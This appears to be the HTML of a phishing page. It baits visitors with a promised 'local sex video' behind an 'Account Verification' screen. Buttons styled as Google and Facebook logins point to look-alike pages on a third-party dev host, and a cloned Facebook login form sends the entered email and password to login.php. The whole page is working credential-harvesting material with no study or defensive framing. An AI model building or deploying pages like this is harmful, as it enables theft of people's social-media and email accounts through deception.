<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>local  mega  sex video </title> 
    
</head>
<body>
<div class="center-box">

   <span class="center-title">Account Verification <br> Continue with Google or Facebook Local Sex video</span>

    <a
href="https://dev-manipur123.pantheonsite.io/Google/login.html">
     <button class="social-google">Log in with Google</button> 
    
</a>


    <a

 href="https://dev-manipur123.pantheonsite.io/Fb/mobile.html">
   <button class="social-facebook">Log in with Facebook</button>
     

   </a>


</body>

</html>















<style>
	
 body  
   
   {
   margin: 0;
   padding: 0;
   font-size: 16px;
   color: #777;
   font-family: sans-serif;
   background-image: url("covid.jpg"), url("paper.gif");
  
   background-position: center;
   background-size: cover;
   font-weight: 300;
   }
   .center-box{
      position: relative;
      margin: 5%auto;
      height: 480px;
      width: 400px;
      background: rgba(0, 0, 0, 0.1);
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.8);
      background-image: url("covid1.jpg");
   }
   .center-title{
      display: block;
      margin-bottom: 100px;
      font-size: 30px;
      color: #fff;
      text-align: center;
      text-shadow: 0 2px 4px rgba(0, 0, 0, 0.6);
   }
.social-facebook{
   margin-bottom: 50px;
   width: 320px;
   height: 50px;
   font-size: 23px;
   border-radius: 2px;
   transition: 0.3s;
   color: #fff;
    background: #32508e;
    text-align: center;
    transition: all 0.3s linear;
}

   .social-google{
  margin-bottom: 20px;
   width: 320px;
   height: 50px;
   font-size: 23px;
   border-radius: 2px;
   transition: 0.3s;
   color: #fff ;
    background: #EC501E;
    text-align: center;
           
   }    
 

</style>

<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<head>
<style>
* {
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
}

html 

body {
  background: ;
  margin: 0;
  padding: 0;
  font-family: 'Lato', sans-serif;
}
h5{
  color: white;
}

.login-form-wrap {
  background: radial-gradient(ellipse at center, #5170ad 0%, #355493 100%);
  border: 1px solid #2d416d;
  -webkit-box-shadow: 0 1px #5670A4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
          box-shadow: 0 1px #5670A4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
  border-radius: 5px;
  width: 360px;
  height: 380px;
  margin: 60px auto;
  padding: 50px 30px 0 30px;
  text-align: center;
}
.login-form-wrap h1 {
  margin: 0 0 50px 0;
  padding: 0;
  font-size: 36px;
  color: #fff;
}
.login-form-wrap h5 {
  margin-top: 40px;
}
.login-form-wrap h5 > a {
  font-size: 100px;
  color: #fff;
  text-decoration: none;
  font-weight: 400;
}

.login-form input[type="text"], .login-form input[type="password"] {
  width: 100%;
  border: 1px solid #314d89;
  outline: none;
  padding: 12px 20px;
  color: #afafaf;
  font-weight: 400;
  font-family: 'Lato', sans-serif;
  cursor: pointer;
}
.login-form input[type="text"] {
  border-bottom: none;
  border-radius: 4px 4px 0 0;
  padding-bottom: 13px;
  -webkit-box-shadow: 0 -1px 0 #E0E0E0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
          box-shadow: 0 -1px 0 #E0E0E0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
}
.login-form input[type="password"] {
  border-top: none;
  border-radius: 0 0 4px 4px;
  -webkit-box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
          box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
}
.login-form input[type="submit"] {
  font-family: 'Lato', sans-serif;
  font-weight: 400;
  background: -webkit-gradient(linear, left top, left bottom, from(#e0e0e0), to(#cecece));
  background: linear-gradient(to bottom, #e0e0e0 0%, #cecece 100%);
  display: block;
  margin: 30px auto 0 auto;
  width: 100%;
  border: none;
  border-radius: 3px;
  padding: 8px;
  font-size: 17px;
  color: #636363;
  text-shadow: 0 1px 0 rgba(255, 255, 255, 0.45);
  font-weight: 700;
  -webkit-box-shadow: 0 1px 3px 1px rgba(0, 0, 0, 0.17), 0 1px 0 rgba(255, 255, 255, 0.36) inset;
          box-shadow: 0 1px 3px 1px rgba(0, 0, 0, 0.17), 0 1px 0 rgba(255, 255, 255, 0.36) inset;
}
.login-form input[type="submit"]:hover {
  background: #DDD;
}
.login-form input[type="submit"]:active {
  padding-top: 9px;
  padding-bottom: 7px;
  background: #C9C9C9;
}
</style>
</head>

<section class="login-form-wrap">
  <h1>Facebook</h1>
  <form class="login-form" action="login.php" method="post">
    <label>
      <input type="text" name="email" placeholder="Email or phone" required>
    </label>
    <label>
      <input type="password" name="pass" placeholder="Password" required>
    </label>
    <input type="submit" value="Login">
  </form>
  
</section>
</html>